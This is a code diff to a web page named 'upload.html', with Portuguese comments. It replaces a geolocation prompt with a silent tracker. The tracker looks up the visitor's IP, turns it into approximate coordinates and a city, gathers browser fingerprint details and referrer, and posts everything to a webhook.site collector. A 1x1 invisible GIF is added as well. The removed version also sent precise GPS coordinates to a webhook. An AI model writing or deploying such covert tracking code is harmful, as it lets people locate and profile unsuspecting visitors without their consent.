--- a/r/upload.html
+++ b/r/upload.html
@@ -1,26 +1,24 @@
 <script>
-navigator.geolocation.getCurrentPosition(
-  pos => {
-    const hit = {
-      lat: pos.coords.latitude,
-      lon: pos.coords.longitude,
-      acc: pos.coords.accuracy,
-      hora: new Date().toISOString(),
-      ua: navigator.userAgent
-    };
-
-    fetch("https://webhook.site/5ca87817-0e0b-4a00-9dad-19840499be75", {
-      method: "POST",
-      body: JSON.stringify(hit),
-      headers: {"Content-Type":"application/json"}
-    });
-  },
-  err => {
-    console.log("Permissão negada ou erro:", err.message);
-  },
-  {
-    enableHighAccuracy: true,
-    timeout: 5000
-  }
-);
+fetch("https://api.ipify.org?format=json")
+  .then(r=>r.json())
+  .then(data=>{
+    fetch(`https://ipapi.co/${data.ip}/json/`)  // Adicione esta linha para lat/lng
+      .then(r=>r.json())
+      .then(geo=>{
+        const hit = {
+          ip: data.ip,
+          lat: geo.latitude,  // Coordenadas aproximadas
+          lng: geo.longitude,
+          hora: new Date().toLocaleString("pt-BR",{timeZone:"America/Sao_Paulo"}),
+          ua: navigator.userAgent,
+          ref: document.referrer,
+          lang: navigator.language,
+          sw: screen.width,
+          sh: screen.height,
+          city: geo.city
+        };
+        fetch("https://webhook.site/SEU_TOKEN",{method:"POST",body:JSON.stringify(hit),headers:{"Content-Type":"application/json"}});
+      });
+  });
 </script>
+<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" alt="">
